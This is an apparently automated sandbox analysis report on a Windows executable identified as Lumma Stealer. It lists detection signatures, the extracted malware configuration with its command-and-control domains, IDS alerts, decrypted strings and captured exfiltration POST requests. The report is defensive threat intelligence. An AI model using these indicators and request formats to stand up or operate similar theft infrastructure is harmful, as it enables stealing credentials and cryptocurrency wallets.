Windows Analysis Report
x6VtGfW26X.exe

Overview

General Information

Sample name: x6VtGfW26X.exe (renamed because original name is a hash value)
Original sample name: c17d20e6be092651357a8b466257b795.exe
Analysis ID: 1582690
MD5: c17d20e6be092651357a8b466257b795
SHA1: 042cc7fc9e7a36bf4989b6be834b0d0d95557c89
SHA256: c35fd8893480f059a48cabc6fc0a956106f55ec96d3fa728fab1bdb4b57c1705
Tags: exe, user-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • x6VtGfW26X.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\x6VtGfW26X.exe" MD5: C17D20E6BE092651357A8B466257B795)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wholersorie.shop", "noisycuttej.shop", "fancywaxxers.shop", "framekgirus.shop", "cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: x6VtGfW26X.exe PID: 6940 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: x6VtGfW26X.exe PID: 6940 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T09:43:02.644820+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:03.623054+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:04.830639+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:06.073842+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:07.598382+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:09.153886+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:10.488984+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:14.085649+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:03.125539+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:04.093969+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:03.125539+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:04.093969+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:02.644820+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:03.623054+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:04.830639+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49732 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:06.073842+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49733 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:07.598382+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:09.153886+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49735 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:10.488984+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49736 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:14.085649+0100 | 2058657 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49737 | 104.21.112.1 | 443 | TCP
2024-12-31T09:43:02.129169+0100 | 2058656 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 50288 | 1.1.1.1 | 53 | UDP
2024-12-31T09:43:09.582681+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 104.21.112.1 | 443 | TCP

            AV Detection

Source: x6VtGfW26X.exe | Avira: detected
Source: fancywaxxers.shop | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/ | Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api | Avira URL Cloud: Label: malware
Source: x6VtGfW26X.exe.6940.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "noisycuttej.shop", "fancywaxxers.shop", "framekgirus.shop", "cloudewahsj.shop", "abruptyopsn.shop", "nearycrepso.shop", "tirepublicerj.shop", "rabidcowse.shop"], "Build id": "PsFKDg--pablo"}
Source: x6VtGfW26X.exe | Virustotal: Detection: 58%
Source: x6VtGfW26X.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: x6VtGfW26X.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor output (one decrypted string per line):
  cloudewahsj.shop
  rabidcowse.shop
  noisycuttej.shop
  tirepublicerj.shop
  framekgirus.shop
  wholersorie.shop
  abruptyopsn.shop
  nearycrepso.shop
  fancywaxxers.shop
  lid=%s&j=%s&ver=4.0
  TeslaBrowser/5.5
  - Screen Resoluton:
  - Physical Installed Memory:
  Workgroup: -
  PsFKDg--pablo
Source: C:\Users\user\Desktop\x6VtGfW26X.exe | Code function: 0_2_007C9362 CryptUnprotectData, 0_2_007C9362
Source: x6VtGfW26X.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2

            Networking

Source: Network traffic | Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.4:50288 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49734 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49732 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Joe Sandbox View | IP Address: 104.21.112.1
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.112.1:443
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: fancywaxxers.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 47
  Host: fancywaxxers.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=HCZVVRB9YU1BI9MGOFD
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 18169
  Host: fancywaxxers.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=T5H7PAQG41KHN8MHY7C
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8790
  Host: fancywaxxers.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=7ZJUYBBS9X5
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20395
  Host: fancywaxxers.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=6OPMM33SI10YDMKDTM
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1248
  Host: fancywaxxers.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=N4Y16TNE0FZYKU
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 569055
  Host: fancywaxxers.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: fancywaxxers.shop
Source: unknown | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: fancywaxxers.shop
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2

            System Summary

            Source: x6VtGfW26X.exe | Static PE information: section name:
            Source: x6VtGfW26X.exe | Static PE information: section name: .idata
            Source: x6VtGfW26X.exe | Static PE information: section name:
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E08E00_2_007E08E0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A08210_2_008A0821
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085E8290_2_0085E829
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082283E0_2_0082283E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088684C0_2_0088684C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008768400_2_00876840
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085A8480_2_0085A848
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007BA8A00_2_007BA8A0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084E8670_2_0084E867
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083486A0_2_0083486A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086A8750_2_0086A875
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082E98B0_2_0082E98B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D49740_2_007D4974
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083A98C0_2_0083A98C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008669A10_2_008669A1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089C9A30_2_0089C9A3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C29CD0_2_008C29CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CA9C00_2_008CA9C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087A9C80_2_0087A9C8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008749DE0_2_008749DE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009669CC0_2_009669CC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008149EF0_2_008149EF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C69160_2_008C6916
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A892B0_2_008A892B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A49290_2_008A4929
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D29CD0_2_007D29CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C09450_2_008C0945
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008369610_2_00836961
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DC9640_2_008DC964
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081AA840_2_0081AA84
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00844A940_2_00844A94
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00862AAC0_2_00862AAC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B0ABB0_2_008B0ABB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D6ABE0_2_008D6ABE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00890ACC0_2_00890ACC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DCA350_2_007DCA35
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00824ACD0_2_00824ACD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081CAD30_2_0081CAD3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083CAD00_2_0083CAD0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008ACAEB0_2_008ACAEB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088EAE50_2_0088EAE5
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DCAF10_2_007DCAF1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089EA140_2_0089EA14
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AAA140_2_008AAA14
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00830A410_2_00830A41
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DAA450_2_008DAA45
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084CA540_2_0084CA54
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00850A500_2_00850A50
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00816A5F0_2_00816A5F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087CA630_2_0087CA63
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088AA650_2_0088AA65
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EEA800_2_007EEA80
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BAB980_2_008BAB98
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00828BA20_2_00828BA2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00870BA10_2_00870BA1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084EBA30_2_0084EBA3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DCB4C0_2_007DCB4C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0098ABD30_2_0098ABD3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CEBC00_2_008CEBC0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087ABED0_2_0087ABED
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B2BE70_2_008B2BE7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E2B100_2_007E2B10
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007CAB000_2_007CAB00
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082AB0F0_2_0082AB0F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008FEB2F0_2_008FEB2F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B4BC00_2_007B4BC0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00808B510_2_00808B51
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D4B5C0_2_008D4B5C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00856B500_2_00856B50
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C4B570_2_008C4B57
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C8B520_2_008C8B52
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086AB7E0_2_0086AB7E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007BEB800_2_007BEB80
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00842CA50_2_00842CA5
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00852CAD0_2_00852CAD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00806CD30_2_00806CD3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084AC050_2_0084AC05
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A2C060_2_008A2C06
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B8C1B0_2_008B8C1B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00818C190_2_00818C19
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089AC220_2_0089AC22
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00840C4D0_2_00840C4D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00848C480_2_00848C48
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085AC500_2_0085AC50
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00822C5D0_2_00822C5D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081EC620_2_0081EC62
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00814C7B0_2_00814C7B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007BED750_2_007BED75
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E2D700_2_007E2D70
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00854D960_2_00854D96
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083AD9E0_2_0083AD9E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089EDAC0_2_0089EDAC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00878DA10_2_00878DA1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CEDA60_2_008CEDA6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DEDB90_2_008DEDB9
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A8DCC0_2_008A8DCC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00866DCE0_2_00866DCE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084EDC80_2_0084EDC8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00850DC80_2_00850DC8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00868DD40_2_00868DD4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087ADD00_2_0087ADD0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00874DD90_2_00874DD9
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A6DFF0_2_008A6DFF
